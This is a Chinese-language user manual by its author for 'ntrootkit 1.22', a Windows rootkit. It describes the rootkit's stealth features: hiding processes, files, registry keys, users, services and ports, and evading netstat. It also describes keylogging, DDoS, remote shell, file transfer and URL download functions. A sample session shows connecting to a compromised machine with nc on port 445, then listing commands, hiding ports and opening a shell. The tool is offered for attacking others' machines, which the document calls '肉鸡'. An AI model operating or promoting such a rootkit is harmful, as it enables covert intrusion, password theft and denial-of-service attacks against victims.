yyt_hac's ntrootkit 1.22 使用说明 一、简介 本ntrootkit采用无连接协议,不开端口,有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp),注意第三种 方式,它只是使用了tcp数据包进行通讯,并没有建立tcp连接,用这种方式只要把目标端口设置成任意一个目标机器上 开的端口,一般都会成功的机会很大。它隐藏进程,文件,目录,服务,注册表项和用户,提供一些很有用的命令。由 于该rootkit有ddos功能,请不要公开传播!如果已经安装了ntrootkit 1.0,必须用'-i'选项升级,重起系统后生效。 ntrootkit 1.1版增加了远程安装,ddos,键盘记录功能,该版本不公开,需要的可向我要。 ntrootkit 1.2版相对于1.1版做了如下改进: 1.修改不能进行键盘记录的bug 2.增加隐藏用户的命令 3.增加system命令,可以在不开命令行窗口的情况下执行外部命令,用system函数运行命令时会弹出命令行窗口, 因此改为用winexec执行,而这个函数不能执行系统内部命令,如dir等。 4.增加配置文件,可以自己配置rootkit,在下面有详细说明 5.隐藏的东西在3389终端中也看不到,注意:用hide系列命令添加的隐藏项在3389终端中不会马上被隐藏,而是在 重新连接终端后隐藏,在配置文件中添加的隐藏项在3389终端中安装完rootkit就能隐藏。 6.增加getsysinfo 命令,可以得到远程机器的一些基本信息 7.增加用fport也看不到被隐藏进程及其开的端口的功能 8.连接密码和网络通讯都进行加密 9.连接异常退出后不需要等几分钟,可以马上连接,但是客户端的ip和连接类型不能改变。 ntrootkit 1.21版相对于1.2版主要增加一种新的连接方式,非常强大,它使得用户可以使用任何一种telnet工具连接 到肉鸡任意一个开的端口上,如139,445,80等,不影响原来端口的功能,而且在肉鸡上用netstat看不到rootkit建立的 连接。 ntrootkit 1.22版相当于1.21版做了如下改变: 1、修正了连接上的一个bug,这个bug会使用户连不上部分一个网卡绑定多个ip地址的机器。 2、增加查看当前机器登录用户的功能,可以用getsysinfo得到当前登录用户。 3、增加了隐藏tcp和udp端口的功能。 4、增加在配置文件中可以配置rootkit的服务显示名和服务的描述消息 5、增加对windows xp和2003的支持。 这是ntrootkit的最终版,不再继续开发了. 二、使用环境 Windows 2000系列操作系统,Windows Xp,Windows 2003(包括客户端和服务器端) 三、使用步骤 下面只是把该版本新加的功能进行简单的演示,其它的使用方法请参考之前版本的使用说明,在我的主页上都有 G:\tools\hack\letmein>nc 192.8.8.100 445 !!!PASSWORD yyt_hac111 Welcome to yyt_hac's ntrootkit Server 1.22 version,use '?' command to get command list CMD>? ********yyt_hac's ntrootkit Server Command List******** ?-------------------------------Show this list HideFileDir [FileName or DIR]----------------------Hide the file or directory(no para will show all file or directory been hidden) HideProcId [pid]----------------Hide process with the id HideProcName [procname]---------Hide process with the process name HideKey [KeyName]---------------Hide the registry key HideValue [ValueName]-----------Hide the registry value HideUser [UserName]-------------Hide the User HideServ [ServiceName]----------Hide the Service HideTcpPort [TcpPort]-----------Hide the tcp port HideUdpPort [UdpPort]-----------Hide the udp port ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden be fore ShowProcId pid------------------UnHide the process that been hidden before with the id ShowProcName procname-----------UnHide the process that been hidden before with the process name ShowKey KeyName-----------------UnHide the registry key ShowValue ValueName-------------UnHide the registry value ShowUser UserName---------------UnHide the user that been hidden before ShowServ ServiceName------------UnHide the service that been hidden before ShowTcpPort TcpPort-------------Unhide the tcp port that been hidden before ShowUdpPort UdpPort-------------Unhide the Udp port that been hidden before Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer KeyLogOn------------------------------Start key log KeyLogOff-----------------------------Stop key log DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos th e destip SDDOS---------------------------------Stop DDos GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file to local computer DelPwd--------------------------------Del the ntrootkit keylog password file Ps------------------------------------Show all processes on remote machine Kill pid------------------------------Kill the process with the id or name RTVer---------------------------------Show Ntrootkit server version and author i nfo SetPass [NewPassword]-----------------Change or show the connection password Reboot--------------------------------Reboot the targer computer OpenShell-----------------------------Open a command shell system command------------------------excute command use system fuction getsysinfo----------------------------get remote system infomation getfile URL [LocalFileName]-----------get file from the URL to LocalFileName Exit----------------------------------Exit the shell or rootkit CMD>getsysinfo Number of CPU:1 Type of CPU:Intel Pentium III or high System Version:Windows nt 5.0 build:2195 Service Pack:2.0 Product type:Windows 2000 Professional Computer Name:YYT_VM The Domain:YYT_VM Users logged on locally:Administrator System Dir:C:\WINNT\System32 CMD>hidetcpport 135 HideTcpPort:successfully CMD>hideudpport 135 HideUdpPort:successfully CMD>openshell Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>cd \ cd \ C:\>dir dir 驱动器 C 中的卷没有标签。 卷的序列号是 8C90-8755 C:\ 的目录 2003-08-31 01:17 Documents and Settings 2003-11-07 00:36 Program Files 2004-04-17 05:20 shares 2003-11-07 00:36 symserver 2003-11-07 00:52 WINNT 0 个文件 0 字节 5 个目录 3,309,969,408 可用字节 C:\>exit CMD>exit exit successfully 四、错误报告 如果你发现了bug,请把rootkit安装目录下的rtkit.log文件和出现的现象发email给我,rtkit.log只是便于我找出错的, 原因,不会记录你私人的信息,谢谢! 连接注意事项: 1、用nc连接时不能连接139端口。 2、用telnet等工具连接时,不能每次都连接成功,多试几次。 3、自己的机器上安装了rootkit,则第三种连接方式(tcp数据包)连接不能成功。 五、和我联系 个人主页:http://www.yythac.com Email:webmaster@yythac.com QQ:47090005 icq:272288117